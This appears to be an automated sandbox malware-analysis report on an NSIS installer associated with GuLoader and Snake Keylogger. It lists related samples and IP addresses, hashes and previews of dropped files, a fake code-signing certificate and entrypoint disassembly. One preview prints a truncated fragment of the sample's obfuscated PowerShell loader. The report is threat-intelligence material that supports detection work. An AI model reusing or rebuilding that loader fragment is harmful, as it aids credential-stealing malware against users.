	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
CLOUDFLARENETUS	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	ql8KpEHT7y.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	8kDIr4ZdNj.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	https://cjerichmond.jimdosite.com/	Get hash	malicious	Unknown	Browse	162.159.128.70
ORACLE-BMC-31898US	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	ql8KpEHT7y.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	8kDIr4ZdNj.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	tx4pkcHL9o.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	4iDzhJBJVv.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	ln5S7fIBkY.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	B3aqD8srjF.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	bd9Gvqt6AK.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	ql8KpEHT7y.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	8kDIr4ZdNj.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	tx4pkcHL9o.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	New Order-090125.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	4iDzhJBJVv.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
3b5074b1b5d032e5620f69f9f700ff0e	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	ID_Badge_Policy.pdf	Get hash	malicious	KnowBe4, PDFPhish	Browse	149.154.167.220
	DpTbBYeE7J.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	149.154.167.220
	7DpzcPcsTS.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	B8FnDUj8hy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	FSRHC6mB16.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	9pIm5d0rsW.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	142.250.186.78 142.250.186.33
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	142.250.186.78 142.250.186.33
	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse	142.250.186.78 142.250.186.33
	g7Mz6hLxqw.exe	Get hash	malicious	GuLoader	Browse	142.250.186.78 142.250.186.33
	ln5S7fIBkY.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.186.78 142.250.186.33
	Osb7hkGfAb.exe	Get hash	malicious	GuLoader	Browse	142.250.186.78 142.250.186.33
	SvmL9tW29w.exe	Get hash	malicious	GuLoader	Browse	142.250.186.78 142.250.186.33
	Osb7hkGfAb.exe	Get hash	malicious	GuLoader	Browse	142.250.186.78 142.250.186.33
	fTSt7dc60O.exe	Get hash	malicious	GuLoader	Browse	142.250.186.78 142.250.186.33
	vq6jxdGvD6.exe	Get hash	malicious	GuLoader	Browse	142.250.186.78 142.250.186.33

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	WYnv59N83j.exe	Get hash	malicious	FormBook, GuLoader	Browse
	t6V3uvyaAP.exe	Get hash	malicious	GuLoader	Browse
	WYnv59N83j.exe	Get hash	malicious	GuLoader	Browse
	t6V3uvyaAP.exe	Get hash	malicious	GuLoader	Browse
	Unspuriousness.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Unspuriousness.exe	Get hash	malicious	GuLoader	Browse
	Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bixynguq.o5i.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hopjxfvq.ivg.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u31yhsv3.izq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztzr0lr4.xmh.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\RmIYOfX0yO.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	5.139253382998066
Encrypted:	false
SSDEEP:	96:s7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN838:UbGgGPzxeX6D8ZyGgmkN
MD5:	1B0E41F60564CCCCCD71347D01A7C397
SHA1:	B1BDDD97765E9C249BA239E9C95AB32368098E02
SHA-256:	13EBC725F3F236E1914FE5288AD6413798AD99BEF38BFE9C8C898181238E8A10
SHA-512:	B6D7925CDFF358992B2682CF1485227204CE3868C981C47778DD6DA32057A595CAA933D8242C8D7090B0C54110D45FA8F935A1B4EEC1E318D89CC0E44B115785
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Technonomic.exe, Detection: malicious, Browse Filename: Azygoses125.exe, Detection: malicious, Browse Filename: WYnv59N83j.exe, Detection: malicious, Browse Filename: t6V3uvyaAP.exe, Detection: malicious, Browse Filename: WYnv59N83j.exe, Detection: malicious, Browse Filename: t6V3uvyaAP.exe, Detection: malicious, Browse Filename: Unspuriousness.exe, Detection: malicious, Browse Filename: Unspuriousness.exe, Detection: malicious, Browse Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, Detection: malicious, Browse Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L...[..V...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nss6CC1.tmp

Download File

Process:	C:\Users\user\Desktop\RmIYOfX0yO.exe
File Type:	data
Category:	dropped
Size (bytes):	10786233
Entropy (8bit):	0.6369574363973121
Encrypted:	false
SSDEEP:	6144:QQauwD+Z2y/poozv/QqeeuHAvIoOGoMh6g/V9efnbegU2pRtr2lVS9uoDATw:QrXyRouv/Qteug+fg/VkfnzRgsD
MD5:	A4D1913EC7F5D246953F7FB3BB9ADF13
SHA1:	B245F27F9EBA51DF4C859DD2F04CF29CBFB8EE53
SHA-256:	C76FFD8ADD718CDA741A1F869866E3A466E06ECC39F1847D2277190F7A5F045D
SHA-512:	AF0AB40D3E0B0CE697EC54BC38E0F5F2882FF7FB0434DBA83967F9B8B5CDCB635131DBE7AE2370A5C705C9B0F0C3270677B75BA818AB5887D649E5DD36B14D1C
Malicious:	false
Preview:	./......,...................q... .......*...................................................................................................................................................................................................................................................G...R...............j...............................................................................................................................#...........6...,....)..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\magmaet\clenched\Fotografiapparat.Sku203

Download File

Process:	C:\Users\user\Desktop\RmIYOfX0yO.exe
File Type:	data
Category:	dropped
Size (bytes):	341428
Entropy (8bit):	7.595140260352883
Encrypted:	false
SSDEEP:	6144:cQauwD+Z2y/poozv/QqeeuHAvIoOGoMh6g/V9efnbM:crXyRouv/Qteug+fg/VkfnA
MD5:	F496251D8A237CE1BC9D65CACA347B81
SHA1:	4A3106946C1D839E84EFA429B294F55C5E922A37
SHA-256:	36F5EB8FBF2F5DD107E9A674C7B6EABFD7F5425135A97380D7AA4268AF7C0F57
SHA-512:	E0DF4A347CFCF8A396D80402CDC64496BEDFD39B9DA6F5F90DDDEFE0A6DA1143ED35FD9E06B63EFA1834610E69E49387DCEC86008C5224250AADE1AFD06AC08F
Malicious:	false
Preview:	...uu........ssss.p...{.......m...........N.....H................ttttttttt.........\..d...tt..0......................44.j....S........h...............[..w............................................f....$$$$............N..................*.V........,....L.V.....J.....R...O......999.(...............................<<..........7......BB........e.&...........o.......'..................7.......y....V.......F........&&&&.T................2.......YY.................vv...(....1.CC..................:.!!.:.........L.......nn.......@....>>>>..e....................g..uu.................................A...............OO.............$$$$..GGGG..................nn...............B..............[....................Y........KK..'...............(((((........E....}}................................4..................N....qq.{......................ss.....}}....&........bb...........//..```........I.............s......ooo..)......44...............................U.........V.....F.11..444..................

C:\Users\user\AppData\Local\magmaet\clenched\Frontoparietal.ruf

Download File

Process:	C:\Users\user\Desktop\RmIYOfX0yO.exe
File Type:	data
Category:	dropped
Size (bytes):	2387610
Entropy (8bit):	0.15942566220329682
Encrypted:	false
SSDEEP:	768:wzAcmELvlCt64oADSmhDEZNe508HYwhsi6zgTmx5upMjAthZFH/Jd3gmXTQu5Y+U:
MD5:	87E50D263F04628637C01FDD66A8F091
SHA1:	C6B097FD62805352C893727A5EDA4BEEDE2E413C
SHA-256:	F59F52215B994807B8ECBB7804CA1C8B4214A8BAAA2DD465E49080B695410842
SHA-512:	3E0BF1BDFEBFF9C29E0C82B0E37EBEC4FE6D94954391658F6CD95E485B76AA7E6FAE87CB70E809684B060A5C966855EE9EB4E8EEB6F178A23BA1E5B69F7954F7
Malicious:	false
Preview:	.....................................................................................................................................................&................................................................................................................................................................................................................................................#.....................................................................................................................................A..........................................................1.............................................................................'.................................................................u..................................................................................................................................................................................................................................................%.............................

C:\Users\user\AppData\Local\magmaet\clenched\RmIYOfX0yO.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	789280
Entropy (8bit):	7.955746290711353
Encrypted:	false
SSDEEP:	12288:6DGZKmormA1FvvLR3x8rqDFXlo3KsAYzjDCwonXnWMIk2CyLuuOSFBPpJh/gpcXF:4mor/1t8uTooHNnXWMIdCkOqXPgKP9
MD5:	5E2FF1914FC1F8EBADF282F4096D6FC8
SHA1:	77D61BDF0CE63EED5324B56623B878FC3DC79890
SHA-256:	F5F3C3A8C7F9F5FB9531FA0D57012CE0869B52B23D05E6C9B7A0220AC917DB6D
SHA-512:	E70121837B94BA002DC2093AFCEBED4EC1D3F90D46D1466FE66E4F0BD16A9426D58547946EF7F420C937017DEB650C5705C7792F6047DE68918F018B7EC4D916
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P..s...P...V...P..Rich.P..........................PE..L...y..V.................b...*.......3............@.......................................@..........................................................................................................................................................text...^a.......b.................. ..`.rdata..p............f..............@..@.data...X............z..............@....ndata...@...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\magmaet\clenched\RmIYOfX0yO.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg

Download File

Process:	C:\Users\user\Desktop\RmIYOfX0yO.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4159), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	74202
Entropy (8bit):	5.150685311846419
Encrypted:	false
SSDEEP:	1536:KKMe8aZFuPsjlp2lA6SnMROyfyadEtF28HHsTAXhrWX9uNPDiJy4X29St0wdHP:K/e8msPsj6z9RBNdEaKHkAVWX9uos4Xh
MD5:	C9297405DF2A5C3C5DEABC095EDF89D1
SHA1:	F2077FC5430342C2A5CECEB58DAC4C7193ADBBEB
SHA-256:	50DB462FBDF3A57CCF31E74DC181F1CCE93DE20D0B5A43F3F576038482618F57
SHA-512:	06E8494AE2AC6A7D68C6B1D53FC6B83F5640FAD1A5771BC84F573306465FB68AD2012960574779FE34137F5154C6FCF9F68ECE128D313716D96882D44324C90D
Malicious:	true
Preview:	$Genialsk=$Recourse;........$Unelided = @'.Erotoge.Disencu$ FishliUVerdestnStiverep ropicr unmakee Atomiss Precone Aabenhn othingtAcquaina Cannisb mskrivi HvalfalBankdiriSatsbettRecontayFiksfakrOutspe b Lkkes.eSkraldejCrith,md SmaakrsKnortsfg ReflekiTrlsomtv.gglutoeSmertefrUndergrbrverkbsiForfalsdAskerstr UnfordaStaged gnonwasteP.enomenTemanume NamaquuEfter.gnFriluftiUglesaan PedantgBonnonusMeld,je=Ndrings$Skil miUVagul.unKontorlp BiogasrGrkereceSkrottesgennemfe.lashban palpretStriftsaFolkedrb Unconci TykneslUmuligti ComplitVarian.yCoasta,r evnedebHom.geneAcronycjPolyphldMoscasssLevigatgWessan.iBl ndervTidsflgeMirisbarA tionibUngiltaiUnwimpldingenirrkenne yaPlen mmgSagsk,te.eknisknSkibspreElsklinjAmtssyge SalmonrLyknskngansvarsmUnderfraVandskos Nonsubshest ryiBrnebogvSnerydneSkriftsrlandskr; Tr.nds.DokumenfFestorguDepravenGunstigcUnwiguntBr,ggari SaltieoStereodnMimiinc Fel proVBacter.i Volc ncUdf.etntforjtteoSkrmf rr StactoiJuniasroClin heuFinalersKalmukknHjredele Ball.dsTerrorhsBaer

C:\Users\user\AppData\Local\magmaet\clenched\aarsungens.bla

Download File

Process:	C:\Users\user\Desktop\RmIYOfX0yO.exe
File Type:	data
Category:	dropped
Size (bytes):	2802123
Entropy (8bit):	0.16014721035839247
Encrypted:	false
SSDEEP:	768:RaE9710bnra8qiClzbvAx57Ano7sKqOSTiTSqBoChrYB6j2QwGcklvNWuxDgQ4uv:C
MD5:	A7D919B312C1C74AB4C35A522D946B77
SHA1:	80DBDC65B19CFB6CBE8AECFA41D28F450857DCC5
SHA-256:	09C869BFBB2A5B7CC84D9E0F56C4F9FA728E1F23C2415DDC0E74FC3D39AA6154
SHA-512:	389824FE2C76C6C2204A56ACC7A160D133279B1C0C1F4A0635DA9351C4D82661D31DF2C536DC2A238F040A23AED46ADDD62657350EDFBA6820869B5B9C0473A5
Malicious:	false
Preview:	.............................................................w............................................................................................................................................................................................7..........................................................................................................................................................................^......................................................................................................................................................................................................r....................d..............................................................................................................................v.......................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\magmaet\clenched\forsmgt.txt

Download File

Process:	C:\Users\user\Desktop\RmIYOfX0yO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	398
Entropy (8bit):	4.246758482060977
Encrypted:	false
SSDEEP:	6:oqMiL/AZwy9A2YYut9HLv4CDGcL+iEnHE9DChVgwCtMWIX0FWWAz6CJArAkyVMIb:vMiL/RDttZPDpL0nHlVg1tXqMWjhb
MD5:	A01CF8B2F34D6F8D6A6067AD87AD420F
SHA1:	C49BFD81A1418697165CB62EDBEEF5E8D47157BA
SHA-256:	A85ACBE8F4FAD0CA373D1BC143633962C89D69E1503A3C310E283DA4EF97B4D7
SHA-512:	B4784A1754ABE449C17A5B88E2D4ECA4D0B9A80E5A20416B80CAAF8989FAB9A6BABCD711691D91246C9B1F12BA7C01FD00450AF247AB4E4B64174E79466636D9
Malicious:	false
Preview:	huskers kvierne workingman.maanedsmagasinerne patriotical torpederinger baromacrometer tubful synchronousness logeion syvendelenes cadere spasmolysis..djvlekultens conscripting nebulium snary streamerbaand balfaldaras nonbeatific unwitless diplomate..ressagernes indifferensen inositols saltningen flimsiness.fusioneringen papists taknemlighedglds transpirering,lkagernes frokostmders farthingdeal.

C:\Users\user\AppData\Local\magmaet\clenched\salpen.zoo

Download File

Process:	C:\Users\user\Desktop\RmIYOfX0yO.exe
File Type:	data
Category:	dropped
Size (bytes):	5161744
Entropy (8bit):	0.15808018941602964
Encrypted:	false
SSDEEP:	768:T+W5rfWR61urINGFhHyjTYYfH8tfhDPzQnR64u4EMMHPdu6izJlM/j2ZGoDuTmnj:moVSf
MD5:	862F3B806ED8EE61690B5CB807E4039F
SHA1:	63579479347755219148DB8926C9FAE8FF3456A4
SHA-256:	B8664ACCEAFF8EDC30B830CCEE20BF79BAC7D003169E8BD7A4C7FB025BBC83A7
SHA-512:	64B1617EB008A3496732D5737F2602F47796B6342DE64498BB93E1A3D94487FA1167DD008400FD19C46DF013FD6C211420AF4C33A9BAC3E15D13C5BE5984430B
Malicious:	false
Preview:	..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................e.....................................................................................................................................................................................................................................................................................

C:\Windows\Resources\unthick.ini

Download File

Process:	C:\Users\user\Desktop\RmIYOfX0yO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	33
Entropy (8bit):	4.187889194919351
Encrypted:	false
SSDEEP:	3:bovixgS7v4M2L:TgS7gZL
MD5:	E23F52386361095BDB7040B09E2216AE
SHA1:	91F31DD82AB80140DB621B6DCE0B9B5D6B568723
SHA-256:	36467321184A76E0FEA592D2896856A37EC18FC8480DE66F05D719D93B39D070
SHA-512:	19D18DE54B3466F0D283271786B3B308C3BE07F21174C46563C4C16292716C52F2C1B85F416ED77143EA6847BFC4C4C37F22296948EAC47499276B181F129B9C
Malicious:	false
Preview:	[gap]..predespond=fascinatingly..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.955746290711353
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RmIYOfX0yO.exe
File size:	789'280 bytes
MD5:	5e2ff1914fc1f8ebadf282f4096d6fc8
SHA1:	77d61bdf0ce63eed5324b56623b878fc3dc79890
SHA256:	f5f3c3a8c7f9f5fb9531fa0d57012ce0869b52b23d05e6c9b7a0220ac917db6d
SHA512:	e70121837b94ba002dc2093afcebed4ec1d3f90d46d1466fe66e4f0bd16a9426d58547946ef7f420c937017deb650c5705c7792f6047de68918f018b7ec4d916
SSDEEP:	12288:6DGZKmormA1FvvLR3x8rqDFXlo3KsAYzjDCwonXnWMIk2CyLuuOSFBPpJh/gpcXF:4mor/1t8uTooHNnXWMIdCkOqXPgKP9
TLSH:	8BF4236262C0D533D9103230C6A9ABF587F1CC96D918DBE73660BC2F79727A5A46B331
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P...s...P...V...P..Rich.P..........................PE..L...y..V.................b...*.....

File Icon


Icon Hash:	070b4d61782c178f

Static PE Info

General

Entrypoint:	0x4033b6
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x567F8479 [Sun Dec 27 06:26:01 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7192d3773f389d45ebac3cc67d054a8a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Kombinationslaases, E=Personalebladenes@Imbrications.Ov, O=Kombinationslaases, L=Riekofen, OU="Premaxillae Flonelsbukserne Mindevrdige ", S=Bayern, C=DE
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	12/03/2024 12:53:56 12/03/2025 12:53:56
Subject Chain	CN=Kombinationslaases, E=Personalebladenes@Imbrications.Ov, O=Kombinationslaases, L=Riekofen, OU="Premaxillae Flonelsbukserne Mindevrdige ", S=Bayern, C=DE
Version:	3
Thumbprint MD5:	5915E457C398F149F6C680F86B343D05
Thumbprint SHA-1:	8D4EA2727C819B72B6D11B906E317D0C3531AEDF
Thumbprint SHA-256:	ACC0D6257B17FB948D65B08ACC8E7D40A1AEFCFEBC9C059F85001533A98C95CD
Serial:	3CF9F331A78358B632C8FA61B083465515E8E437

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebp
push esi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+0Ch], ebp
push 00008001h
mov dword ptr [esp+0Ch], 0040A230h
mov dword ptr [esp+18h], ebp
call dword ptr [004080B4h]
call dword ptr [004080B0h]
cmp ax, 00000006h
je 00007F204CE78023h
push ebp
call 00007F204CE7B17Eh
cmp eax, ebp
je 00007F204CE78019h
push 00000C00h
call eax
push ebx
push edi
push 0040A3B0h
call 00007F204CE7B0FBh
push 0040A3A8h
call 00007F204CE7B0F1h
push 0040A39Ch
call 00007F204CE7B0E7h
push 00000009h
call 00007F204CE7B14Ch
push 00000007h
call 00007F204CE7B145h
mov dword ptr [0042A264h], eax
call dword ptr [00408044h]
push ebp
call dword ptr [004082A8h]
mov dword ptr [0042A318h], eax
